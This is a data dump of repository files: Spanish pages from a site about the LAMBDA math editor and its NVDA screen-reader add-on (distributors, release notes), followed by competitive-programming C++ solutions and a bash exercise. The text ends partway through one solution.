"text": "<!--\n.. title: Datos de contacto de distribuidores LAMBDA en España\n.. slug: distribuidores\n.. date: 2017-08-11 20:18:49 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n-->\n\nEn España solo existe un distribuidor a gran escala de LAMBDA. Si conoces o formas parte de algún distribuidor autorizado LAMBDA y deseas ser incluido en esta lista ponte en contacto con [[email protected]](mailto:[email protected]).\n\n## Listado de distribuidores\n### Centro de Investigación, Desarrollo y Aplicación Tiflotécnica de la Organización Nacional de ciegos Españoles (ONCE-CIDAT)\n\nCno. de Hormigueras, 172 \n28031 Madrid; Madrid, Comunidad de; Spain \nTeléfono directo/Direct phone: (+34) 917 097 600 \nteléfono atención a usuarios/Users attention phone: (+34) 910 109 111 (opción 2, CIDAT) \nFax: (+34) 917 097 777 \nEmail: [[email protected]](mailto:cidat€once.es) \nWeb: <http://cidat.once.es> \nAll telephone numbers above are diallable from outside Spain./Todos los números de teléfono arriba son marcables desde fuera de España.\n\n#### Adaptaciones de puesto de estudio\n\nLa ONCE concede gratuitamente a alumnos de enseñanzas oficiales con motivos justificados, el editor LAMBDA. Para obtener más información, puedes ponerte en contacto con el centro de la ONCE (DT, DZ, DAP o agencia) al que estás adscrito, o en el CRE del que educativamente depende dicho centro. Más información sobre los servicios educativos de la once en <http://educacion.once.es>."
},
{
"alpha_fraction": 0.6134969592094421,
"alphanum_fraction": 0.6687116622924805,
"avg_line_length": 24.153846740722656,
"blob_id": "0d52af034386f6056cc030b817e825865ae9fdaa",
"content_id": "c1f3884aa16b92e163ce5d266f96b76aa0ecd33e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 13,
"path": "/a/bienvenidos-a-la-web-de-lambda-nvda-esp/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: bienvenidos a la web de LAMBDA-NVDA-esp\n.. slug: bienvenidos-a-la-web-de-lambda-nvda-esp\n.. date: 2017-05-24 17:43:03 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nPues eso, bienvenidos. Podéis obtener más información sobre nosotros [aquí](link://slug/about)"
},
{
"alpha_fraction": 0.7509377598762512,
"alphanum_fraction": 0.7786946892738342,
"avg_line_length": 94.21428680419922,
"blob_id": "fbbb9c19b6cb02859ef8a329d9cf3e9139bc9621",
"content_id": "a2d8371b9c06774c6514214d583bf607f7ee9973",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1350,
"license_type": "no_license",
"max_line_length": 794,
"num_lines": 14,
"path": "/a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Actualizaciones de agosto a octubre de 2017: versión 1.2.1 y transición a NVDA.es\n.. slug: actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes\n.. date: 2017-10-23 17:47:32 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nDesde agosto se han realizado varios cambios reseñables en el complemento. Por ejemplo, la publicación de la versión 1.2.1 del complemento que ya se puede descargar desde la web oficial e incluye mejoras relativas al braille.\nPero la novedad más importante que hay que anunciar llega este lunes 23 de octubre. Debido a que se ha creado y presentado una nueva y completa web para la comunidad hispanohablante de NVDA, se ha decidido que los contenidos de esta web se integren en la nueva, de forma que los usuarios puedan conocer todas las novedades sobre NVDA y su entorno en un solo lugar. Así pues, se anuncia que desde ahora y progresivamente se comenzará a cambiar cierta información de interés general. Al final del proceso la vocación de informar sobre LAMBDA con NVDA en español con la que nació esta web será transferida a NVDA.es. Seguiremos informando y para finalizar aclaramos que no cambiarán las personas que están detrás de este proyecto. Gracias por el apoyo, y sobre todo, por el uso de nuestro trabajo.\n"
},
{
"alpha_fraction": 0.7583262324333191,
"alphanum_fraction": 0.7830913662910461,
"avg_line_length": 67.88235473632812,
"blob_id": "60ca296be64ece3e82dcf39dc33c6d4f2d68b1be",
"content_id": "d218337f55c1ba7fff13934e8aa3caac9d2f4b61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1185,
"license_type": "no_license",
"max_line_length": 308,
"num_lines": 17,
"path": "/a/liberada-la-version-118-del-complemento-para-lambda-primera-version-estable/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Liberada la versión 1.1.8 del complemento para LAMBDA, primera versión estable\n.. slug: liberada-la-version-118-del-complemento-para-lambda-primera-version-estable\n.. date: 2017-06-19 12:25:53 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nHoy día 19 de junio, como estaba previsto, ha sido liberada al público la versión 1.1.8 del complemento para LAMBDA, descargable desde [https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon](https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon).\nEn cuanto llegue el complemento al repositorio de traductores en Assembla se actualizarán las traducciones. La traducción de los mensajes está actualizada, pero la de la documentación es la que necesita ser comparada y traducida para estar en consonancia con la original en inglés.\nDesde aquí continuaremos trabajando dando soporte a la tabla braille española y a las traducciones española y gallega.\n\nCon esta versión, al fin, se culmina un trabajo de varias personas desde septiembre que ha conseguido igualar el soporte para LAMBDA de NVDA al de Jaws.\n"
},
{
"alpha_fraction": 0.7712206840515137,
"alphanum_fraction": 0.7857720255851746,
"avg_line_length": 76.3125,
"blob_id": "53ee8e51f557991dd7884494311630a203a0c502",
"content_id": "38f87d7584e43e36fb1d9166843a0b7acd83f5ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 645,
"num_lines": 16,
"path": "/a/actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Actualizadas traducciones: añadida traducción para el mensaje de alerta de perfil lambda existente\n.. slug: actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente\n.. date: 2017-05-27 13:23:02 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nEn el día de hoy se ha enviado la pull request al repo oficial para incluír en la versión inestable (rama master) las últimas traducciones (español y gallego). En ambos idiomas se ha traducido el diálogo que avisa de que un perfil llamado lambda ya existe (en su nueva versión). se recuerda a los usuarios que la versión dev en el sitio de complementos no incluye traducciones. Para descargar una con ellas está disponible un enlace en [la web de la [comunidad hispanohablante](https://nvdaes.github.io). También puedes compilar uno si cuentas con las herramientas necesarias, descritas en la documentación de desarrollo de complementos de NVDA.\nEsta será probablemente la última traducción que se envíe por este método, ya que cuando se declare una versión estable las traducciones pasarán a administrarse a través del repositorio de la comunidad de traductores.\n\nSeguiremos informando.\n"
}
] | 10 |
anhoangphuc/CP
|
https://github.com/anhoangphuc/CP
|
d0fcc3f4c25f3216f02d1dfdd68cf817a336a0f3
|
609f18852bd76dbc7b2ed52e44f3b58095e8c3b9
|
a6334a20b6fb6cfe8cb422dab980c09bd69eff50
|
refs/heads/master
| 2022-07-19T11:42:36.017438 | 2022-07-02T04:11:24 | 2022-07-02T04:11:24 | 208,000,598 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.29596978425979614,
"alphanum_fraction": 0.32430729269981384,
"avg_line_length": 26.909090042114258,
"blob_id": "87188550123815e1034a6a092faa9d36458543fc",
"content_id": "6c024a62df8a739f0dbdcd767269c9a5bdc349a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 55,
"path": "/codeforces/266446A.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\ntypedef long long int ll;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >=b; i--)\r\n\r\nconst int NMAX = 3e2 + 3;\r\n\r\nint a[NMAX], n, k;\r\nll f[NMAX][NMAX][NMAX];\r\n\r\n//--------------------------------------------------\r\nvoid openf() {\r\n freopen(\"bonus.inp\", \"r\", stdin);\r\n freopen(\"bonus.out\", \"w\", stdout);\r\n cin >> n >> k;\r\n rep(i, 1, n)\r\n cin >> a[i];\r\n}\r\n\r\nbool valid(int i, int j, int v) {\r\n return (i <= j && v * 2 <= (j - i + 1));\r\n}\r\n\r\nvoid process() {\r\n rep(i, 1, n - 1)\r\n f[i][i + 1][1] = abs(a[i] - a[i + 1]);\r\n \r\n rep(t, 2, n) \r\n rep(i, 1, n - 2) {\r\n int j = i + t;\r\n if (j > n) break;\r\n for (int v = 1; v <=k; v++) {\r\n if (v * 2 > t + 1)\r\n break;\r\n f[i][j][v] = max(f[i + 1][j][v], f[i][j - 1][v]);\r\n if (valid(i + 2, j, v - 1) && f[i][j][v] < f[i + 2][j][v - 1] + abs(a[i] - a[i + 1])) \r\n f[i][j][v] = f[i + 2][j][v - 1] + abs(a[i] - a[i + 1]);\r\n\r\n if (valid(i, j - 2, v - 1) && f[i][j][v] < f[i][j - 2][v - 1] + abs(a[j] - a[j - 1])) \r\n f[i][j][v] = f[i][j - 2][v - 1] + abs(a[j] - a[j - 1]);\r\n\r\n if (valid(i + 1, j - 1, v - 1) && f[i][j][v] < f[i + 1][j - 1][v - 1] + abs(a[i] - a[j])) \r\n f[i][j][v] = f[i + 1][j - 1][v - 1] + abs(a[i] - a[j]);\r\n }\r\n }\r\n cout << f[1][n][k];\r\n}\r\n\r\nint main() {\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.31506848335266113,
"alphanum_fraction": 0.3219178020954132,
"avg_line_length": 19.904762268066406,
"blob_id": "3e134119f58d9b2904d57befc5f966144bdec8c7",
"content_id": "d51b9610399f5272b7f9b1ab18964c7fae2de936",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 21,
"path": "/uva/272.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nint main() {\n string s;\n freopen(\"test.inp\", \"r\", stdin);\n int cnt = 0;\n while (getline(cin, s)) {\n for (auto x: s) {\n if (x == '\"') {\n if (cnt == 0)\n cout << \"``\";\n else\n cout << \"''\";\n cnt ^= 1;\n }\n else cout << x;\n }\n cout << endl;\n }\n}"
},
{
"alpha_fraction": 0.32423755526542664,
"alphanum_fraction": 0.33306580781936646,
"avg_line_length": 17.200000762939453,
"blob_id": "2b008bc8aa009ad72e742fb844112e28947208f6",
"content_id": "0013cea29d2bde95ed40020eada5250976bc402a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1246,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 65,
"path": "/katis/froshweek.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int NMAX = 1e6 + 3;\r\n\r\nvector<int> a, b;\r\nint n;\r\nint ft[NMAX];\r\nmap<int, int> m;\r\n//----------------------------------------\r\nvoid openf() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n cin >> n;\r\n int u;\r\n rep(i, 1, n) {\r\n cin >> u;\r\n a.push_back(u);\r\n }\r\n}\r\n//----------------------------------------\r\nint getResult(int x) {\r\n int re = 0;\r\n while (x > 0) {\r\n re += ft[x];\r\n x -= x & (-x);\r\n }\r\n\r\n return re;\r\n}\r\n//----------------------------------------\r\nvoid updateTree(int x) {\r\n while (x < NMAX) {\r\n ft[x] += 1;\r\n x += x & (-x);\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n b = a;\r\n sort(b.begin(), b.end());\r\n\r\n int cnt = 0;\r\n for (auto x: b) \r\n m[x] = ++cnt;\r\n\r\n ll res = 0;\r\n cnt = 0;\r\n for (auto x: a) {\r\n int v = m[x];\r\n res += cnt - getResult(v); \r\n cnt += 1;\r\n updateTree(v);\r\n }\r\n\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.5365853905677795,
"alphanum_fraction": 0.5408895015716553,
"avg_line_length": 35.72972869873047,
"blob_id": "ea277b68398d535e2e8e6c3bdcaa47f2dae6a6f6",
"content_id": "38b504bdeaf4e59fbc9108587d8a9c69571f0626",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1394,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 37,
"path": "/katis/mandelbrot.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\ntypedef pair<float, float> realNumber;\r\n//----------------------------------------\r\nfloat getModule(realNumber zn) {\r\n return sqrt(zn.first*zn.first + zn.second*zn.second);\r\n}\r\n//----------------------------------------\r\nrealNumber addRealNumber(realNumber firstNumber, realNumber secondNumber) {\r\n return realNumber(firstNumber.first + secondNumber.first,\r\n firstNumber.second + secondNumber.second);\r\n}\r\n//----------------------------------------\r\nrealNumber doubleRealNumber(realNumber zn) {\r\n return realNumber(zn.first*zn.first - zn.second*zn.second, 2*zn.first*zn.second);\r\n}\r\n//----------------------------------------\r\nstring process(float realPortion, float imagPortion, int itera) {\r\n realNumber cValue = realNumber(realPortion, imagPortion);\r\n realNumber zn = realNumber(0, 0);\r\n do {\r\n if (getModule(zn) > 2) return \"OUT\";\r\n zn = addRealNumber(cValue, doubleRealNumber(zn));\r\n }\r\n while (itera-- > 0);\r\n return \"IN\";\r\n}\r\n//----------------------------------------\r\nint main() {\r\n float realPortion, imagPortion;\r\n int itera, testCase = 0;\r\n while (cin >> realPortion >> imagPortion >> itera) {\r\n cout << \"Case \" << (++testCase) << \": \" << process(realPortion, imagPortion, itera) << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.4767676889896393,
"alphanum_fraction": 0.5010101199150085,
"avg_line_length": 16.678571701049805,
"blob_id": "3b1dd86357b46ccf9e39b84d986ff046309cac2a",
"content_id": "48e3bb03de171369941346845b8b1d4652efdacc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 28,
"path": "/leetcode/sell_stock.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\npublic:\n\tint maxProfit(vector<int>& a) {\n\t\tint res = 0, cur = 0;\n\t\tbool buyed = false;\n\n\t\ta.push_back(0);\n\t\tfor (int i = 0; i < a.size(); i++) {\n\t\t\tif (a[i] < a[i + 1] && !buyed) {\n\t\t\t\tbuyed = true;\n\t\t\t\tcur = a[i];\n\t\t\t} else if (a[i] > a[i + 1] && buyed) {\n\t\t\t\tbuyed = false;\n\t\t\t\tres += a[i] - cur;\n\t\t\t}\n\t\t}\n\t\treturn res;\n\t}\n};\n\nint main() {\n\tSolution a = Solution();\n\tvector<int> b {7, 1, 5, 3, 6, 4};\n\tcout << a.maxProfit(b);\n};\n"
},
{
"alpha_fraction": 0.5028943419456482,
"alphanum_fraction": 0.5274963974952698,
"avg_line_length": 27.446807861328125,
"blob_id": "5fc2b8409e53c9a93b2e2243715100b17abf3d2c",
"content_id": "b1b0a2823cbf34bcd74a5cd3a01f954341d8c88e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1382,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 47,
"path": "/katis/natrij.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n\r\n//----------------------------------------\r\nint stringToSecond(string timeString) {\r\n int res = 0;\r\n res = stoi(timeString.substr(0, 2)) * 3600;\r\n res += stoi(timeString.substr(3, 2)) * 60;\r\n res += stoi(timeString.substr(6, 2));\r\n return res; \r\n}\r\n//----------------------------------------\r\nstring pad(string temp) {\r\n if (temp.length() < 2) {\r\n temp = '0' + temp;\r\n }\r\n return temp;\r\n}\r\n//----------------------------------------\r\nstring secondToString(int timeSecond) {\r\n string hour = to_string(timeSecond / 3600);\r\n timeSecond %= 3600;\r\n hour = pad(hour);\r\n\r\n string minute = to_string(timeSecond / 60);\r\n timeSecond %= 60;\r\n minute = pad(minute);\r\n\r\n string second = to_string(timeSecond);\r\n second = pad(second);\r\n\r\n return hour + \":\" + minute + \":\" + second;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n string timeXString, timeYString; \r\n cin >> timeXString; \r\n cin >> timeYString;\r\n int timeXInSecond = stringToSecond(timeXString);\r\n int timeYInSecond = stringToSecond(timeYString);\r\n int differenceInSecond = timeYInSecond - timeXInSecond;\r\n if (differenceInSecond <= 0) \r\n differenceInSecond += 24 * 3600;\r\n cout << secondToString(differenceInSecond);\r\n}"
},
{
"alpha_fraction": 0.5383244156837463,
"alphanum_fraction": 0.5579322576522827,
"avg_line_length": 24.714284896850586,
"blob_id": "c986ad578c6aa0d71a8c4ba87cc5c9f0eb9c2bfe",
"content_id": "cd60d51feda150a3bab647af25d94507b37b3457",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 21,
"path": "/leetcode/twoSum.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tvector<int> twoSum(vector<int>& nums, int target) {\r\n\t\t\tfor (auto ind = nums.begin(); ind != nums.end(); ind++) {\r\n\t\t\t\tauto t = find(ind + 1, nums.end(), target - *ind);\t\r\n\t\t\t\tif (t != nums.end())\r\n\t\t\t\t\treturn vector<int> {static_cast<int>(ind - nums.begin()), static_cast<int>(t - nums.begin())};\r\n\t\t\t}\r\n\t\t\treturn vector<int> {0, 0};\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution solution;\r\n\tvector<int> a{3, 1, 2, 1, 5};\r\n\tauto res = solution.twoSum(a, 5);\r\n\tcout << res[0] << res[1];\r\n}\r\n"
},
{
"alpha_fraction": 0.5821256041526794,
"alphanum_fraction": 0.5893719792366028,
"avg_line_length": 31.6842098236084,
"blob_id": "45b51e115d057916b7b3ffa173a200b46d97efa4",
"content_id": "2ea9397492c018b48bc55c760deffc1b8ee9001a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1242,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 38,
"path": "/leetcode/39.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <iostream>\n\nusing namespace std;\n\nclass Solution {\npublic:\n vector<vector<int>> res;\n vector<vector<int>> combinationSum(vector<int>& candidates, int target) {\n sort(candidates.begin(), candidates.end());\n tryValue(candidates, target, 0, 0, {});\n return res;\n }\n\n void tryValue(vector<int>& candidates, int target, int position, int currentSum, vector<int> currentCombination) {\n if (position == candidates.size()) {\n if (target == currentSum) res.push_back(currentCombination);\n return;\n }\n int rep = (target - currentSum) / candidates[position];\n for (int i = 0; i <= rep; i++) {\n vector<int> newValue(i, candidates[position]);\n vector<int> newCombination(currentCombination);\n newCombination.insert(newCombination.end(), newValue.begin(), newValue.end());\n tryValue(candidates, target, position + 1, currentSum + candidates[position] * i, newCombination);\n }\n }\n};\n\nint main() {\n Solution a = Solution();\n vector<int> v = { 2, 3, 6, 7 };\n auto r = a.combinationSum(v, 8);\n for (auto x: r) {\n for (auto y: x) cout << y << \" \";\n cout << endl;\n }\n}\n"
},
{
"alpha_fraction": 0.45972222089767456,
"alphanum_fraction": 0.4819444417953491,
"avg_line_length": 23,
"blob_id": "471a1faf9096de6e769a4133a3f4fd3c316cda71",
"content_id": "3e6b796e899d6ca72b769f29e6679d833dcd21ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 720,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 30,
"path": "/leetcode/zigzag-conversion.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n\tpublic:\n\t\tstring convert(string s, int numRows) {\n\t\t\tif (numRows == 1) return s;\n\t\t\ttypedef pair<pair<int, int>, char> t;\t\n\t\t\tvector<t> g;\n\t\t\tint x[2] = {1, -1}, y[2] = {0, 1};\n\t\t\tint u(-1), v(0), dir(0);\n\t\t\tfor (int i = 0; i <\ts.length(); i++) {\n\t\t\t\tu += x[dir]; v += y[dir];\n\t\t\t\t//cout << u << \" \" << v << \" \" << i << \" \" << s[i] << endl;\n\t\t\t\tg.push_back(make_pair(make_pair(u, v), s[i]));\n\t\t\t\tif (i > 0 && (i % (numRows - 1)) == 0)\n\t\t\t\t\tdir = dir ^ 1;\n\t\t\t}\n\t\t\tsort(g.begin(), g.end());\n\t\t\tstring res = \"\";\n\t\t\tfor (auto x: g) \n\t\t\t\tres += x.second;\n\t\t\treturn res;\n\t\t}\n};\n\nint main() {\n\tSolution a = Solution();\n\tcout << a.convert(\"PAYPALISHIRING\", 3);\n}\n"
},
{
"alpha_fraction": 0.39030611515045166,
"alphanum_fraction": 0.4234693944454193,
"avg_line_length": 18.63157844543457,
"blob_id": "03eb3ed2d5252d337cd9054d1e7b5de327cbf9b4",
"content_id": "0ed45a2742042332df42ce307473e584118ec84e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 38,
"path": "/leetcode/longestPalinString.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n\r\nclass Solution {\r\n\tpublic: \r\n\t\tbool f[1002][1002];\r\n\t\tstring longestPalindrome(string s) {\r\n\t\t\tfor (int i = 0; i < s.length(); i++) {\r\n\t\t\t\tf[i][i] = 1;\r\n\t\t\t\tf[i + 1][i] = 1;\r\n\t\t\t}\r\n\r\n\t\t\tint res = 0;\r\n\t\t\tstring rres = \"\";\r\n\t\t\tif (s.length() > 0) {\r\n\t\t\t\tres = 0;\r\n\t\t\t\trres = s[0];\r\n\t\t\t}\r\n\t\t\tfor (int l = 2; l <= s.length(); l++) \r\n\t\t\t\tfor (int i = 0; i < s.length(); i++) {\r\n\t\t\t\t\tint j = i + l - 1;\r\n\t\t\t\t\tif (j >= s.length()) continue;\r\n\t\t\t\t\tif (f[i + 1][j - 1] == 0 || s[i] != s[j]) continue;\r\n\t\t\t\t\tf[i][j] = 1;\r\n\t\t\t\t\tif (j - i + 1 > res) {\r\n\t\t\t\t\t\tres = j - i + 1;\r\n\t\t\t\t\t\trres = s.substr(i, j - i + 1);\r\n\t\t\t\t\t}\r\n\t\t\t\t} \r\n\t\t\treturn rres;\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution a = Solution();\r\n\tcout << a.longestPalindrome(\"cbefeb\");\r\n}\r\n"
},
{
"alpha_fraction": 0.33188721537590027,
"alphanum_fraction": 0.3427331745624542,
"avg_line_length": 20,
"blob_id": "a0955306a0a4c2f42eace13d8c9ec909bde05827",
"content_id": "7cf2982a74d33e346052057633f9175c41657f0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 42,
"path": "/katis/wheresmyinternet.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\nconst int NMAX = 2e5 + 3;\r\nint dj[NMAX], n, m;\r\n\r\n//----------------------------------------\r\nint find(int u) {\r\n return dj[u] < 0 ? u: dj[u] = find(dj[u]);\r\n}\r\n//----------------------------------------\r\nvoid unionSet(int u, int v) {\r\n if (u == v) return;\r\n if (u > v) swap(u, v);\r\n dj[u] += dj[v];\r\n dj[v] = u;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int u, v;\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n cin >> n >> m; \r\n rep(i, 1, n)\r\n dj[i] = -1;\r\n\r\n while (m--) {\r\n cin >> u >> v;\r\n int pu = find(u), pv = find(v);\r\n unionSet(pu, pv);\r\n }\r\n\r\n if (dj[1] == -n) \r\n cout << \"Connected\";\r\n else {\r\n rep(i, 1, n)\r\n if (i != 1 && find(i) != 1)\r\n cout << i << endl;\r\n }\r\n\r\n}"
},
{
"alpha_fraction": 0.5569620132446289,
"alphanum_fraction": 0.6329113841056824,
"avg_line_length": 8.875,
"blob_id": "e5a99898e755d22c20ebcf615f62d0421eb74e9a",
"content_id": "277f60ff8028a6f36b7c5a74880e87e75d903d22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 79,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 8,
"path": "/bash/hackerrank/uniq.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#uniq1\nuniq\n#uniq2\nuniq -c | cut -c7-\n#uniq3\nuniq -ic | cut -c7\n#uniq4\nuniq -u\n"
},
{
"alpha_fraction": 0.3761172592639923,
"alphanum_fraction": 0.38755810260772705,
"avg_line_length": 23.91666603088379,
"blob_id": "311d3ab3f201f0493d40fe221619760ad98d6a3a",
"content_id": "24ce23f53204637fcf8d298720ae6a1fd247af1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2797,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 108,
"path": "/katis/reversingroads.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 53;\r\nint n, m, cnt = 0, connectedComponent = 0;\r\nvector<int> ds[NMAX];\r\nint low[NMAX], num[NMAX];\r\nstack<int> st;\r\nbool incomp[NMAX];\r\nvector<pair<int, int>> edges;\r\n//----------------------------------------\r\nvoid openf() {\r\n int u, v;\r\n rep(i, 0, m - 1) \r\n ds[i].clear();\r\n edges.clear();\r\n rep(i, 1, n) {\r\n cin >> u >> v;\r\n ds[u].push_back(v);\r\n edges.push_back(make_pair(u, v));\r\n //cout << u << \" \" << v << endl;\r\n }\r\n}\r\n//----------------------------------------\r\nvoid scc(int u, int cu, int cv) {\r\n st.push(u);\r\n incomp[u] = 1;\r\n\r\n low[u] = num[u] = ++cnt;\r\n for (auto v: ds[u]) {\r\n if (u == cu && v == cv) continue;\r\n if (num[v] == -1) {\r\n scc(v, cu, cv);\r\n low[u] = min(low[u], low[v]);\r\n } else if (incomp[v])\r\n low[u] = min(low[u], num[v]);\r\n }\r\n if (u == cv) {\r\n auto v = cu;\r\n if (num[v] == -1) {\r\n scc(v, cu, cv);\r\n low[u] = min(low[u], low[v]);\r\n } else if (incomp[v]) \r\n low[u] = min(low[u], num[v]);\r\n }\r\n\r\n //cout << u << \" \" << low[u] << \" \" << num[u] << endl;\r\n if (num[u] == low[u]) {\r\n connectedComponent++;\r\n while (true) {\r\n auto curr = st.top();\r\n incomp[curr] = 0;\r\n st.pop();\r\n if (curr == u) break;\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nbool isValid(int cu, int cv) {\r\n cnt = connectedComponent = 0;\r\n while (!st.empty()) st.pop();\r\n memset(num, -1, sizeof(num));\r\n memset(low, -1, sizeof(low));\r\n memset(incomp, 0, sizeof(incomp));\r\n\r\n rep(i, 0, m - 1) \r\n if (num[i] == -1) scc(i, cu, cv);\r\n\r\n //cout << \"CC \" << connectedComponent << endl;\r\n return (connectedComponent == 1);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n if (isValid(-1, -1)) {\r\n cout << \"valid\";\r\n return;\r\n }\r\n for (auto x:edges) \r\n if (isValid(x.first, x.second)) {\r\n cout << x.first << \" \" << x.second;\r\n return;\r\n }\r\n cout << \"invalid\";\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n 